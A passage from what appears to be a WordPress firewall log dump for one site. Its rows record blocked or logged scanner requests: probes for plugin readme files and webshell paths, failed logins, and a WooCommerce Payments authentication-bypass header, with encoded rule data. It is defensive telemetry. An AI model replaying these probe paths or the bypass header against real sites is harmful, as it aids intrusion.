Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134749,1700237298.700878,1700237298.693200,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ht-mega-for-elementor/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134723,1700192264.910715,1700192264.884000,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134736,0.000000,1700223547.030244,0x00000000000000000000FFFF7AA03D64,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134737,0.000000,1700223547.075144,0x00000000000000000000FFFF7AA03D64,0,200,0,0,0,'https://ECKANKAR-COLORADO.ORG/wp-login.php','HTTPS://ECKANKAR-COLORADO.ORG/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134734,1700200484.717186,1700200484.709300,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kcmFnLWFuZC1kcm9wLW11bHRpcGxlLWZpbGUtdXBsb2FkLWNvbnRhY3QtZm9ybS03L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kcmFnLWFuZC1kcm9wLW11bHRpcGxlLWZpbGUtdXBsb2FkLWNvbnRhY3QtZm9ybS03L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134724,1700192252.666755,1700192252.657900,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134738,0.000000,1700223621.295919,0x00000000000000000000FFFF29C1053C,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(133108,1699825267.740309,1699825267.731000,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133137,1699888499.203930,1699888499.188200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-embed.php','http://eckankar-colorado.org/wp-includes/class-wp-embed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWVtYmVkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133123,1699840833.189010,1699840833.160900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://www.eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133124,1699841951.417695,1699841951.395700,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133125,1699848633.196829,1699848633.189000,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/bestbooks/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iZXN0Ym9va3MvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iZXN0Ym9va3MvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133129,1699858681.631131,1699858681.626100,0x00000000000000000000FFFF923BF2EC,0,403,0,0,0,'https://mail.eckankar-colorado.org/',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:waf','WooCommerce Payments <= 5.6.1 Authentication Bypass and Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"568\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtV2NwYXktUGxhdGZvcm0tQ2hlY2tvdXQtVXNlcl0=\",\"paramValue\":\"MQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(133126,1699848633.196579,1699848633.189000,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/bestbooks/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iZXN0Ym9va3MvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iZXN0Ym9va3MvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133127,1699856841.123396,1699856841.114600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133132,1699866999.772870,1699866999.750600,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133128,1699856852.754154,1699856852.745400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133135,1699880009.210307,1699880009.188700,0x00000000000000000000FFFF55D7A2F3,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wordpresscore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3Njb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133130,1699858681.630289,1699858681.626100,0x00000000000000000000FFFF923BF2EC,0,200,0,0,0,'https://mail.eckankar-colorado.org/',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','logged:waf','Universal Privilege Escalation Detection Rule','{\"learningMode\":0,\"failedRules\":\"logged|554\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"privesc\",\"ssl\":1}'),(133136,1699888499.549469,1699888499.527600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-error.php','http://eckankar-colorado.org/wp-includes/class-wp-error.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWVycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133131,1699858681.630090,1699858681.626100,0x00000000000000000000FFFF923BF2EC,0,200,0,0,0,'https://mail.eckankar-colorado.org/',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','logged:waf','Universal Privilege Escalation Detection Rule','{\"learningMode\":0,\"failedRules\":\"logged|554\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzBd\",\"paramValue\":\"YWRtaW5pc3RyYXRvcg==\",\"path\":\"Lw==\",\"category\":\"privesc\",\"ssl\":1}'),(133133,1699879015.644604,1699879015.610100,0x00000000000000000000FFFF5B5CF3D4,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?upload=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133134,1699879671.780084,1699879671.758200,0x00000000000000000000FFFF04F0549B,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133293,1699888655.890103,1699888655.881200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/home/','http://eckankar-colorado.org/home/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2hvbWUv\",\"category\":\"brute-force\",\"ssl\":1}'),(133274,1699888666.592027,1699888666.578200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.matroska.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio-video.matroska.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ubWF0cm9za2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133298,1699888654.209023,1699888654.200400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/blog/wp-admin/includes/','http://eckankar-colorado.org/blog/wp-admin/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtYWRtaW4vaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133294,1699888655.559632,1699888655.551000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/files/','http://eckankar-colorado.org/files/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133287,1699888657.930255,1699888657.908400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/site/wp-admin/includes/','http://eckankar-colorado.org/site/wp-admin/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtYWRtaW4vaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133297,1699888654.540124,1699888654.531500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','http://eckankar-colorado.org/cgi-bin/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(133288,1699888657.587487,1699888657.578900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/mt/','http://eckankar-colorado.org/mt/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L210Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133292,1699888656.226121,1699888656.217500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/images/','http://eckankar-colorado.org/images/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 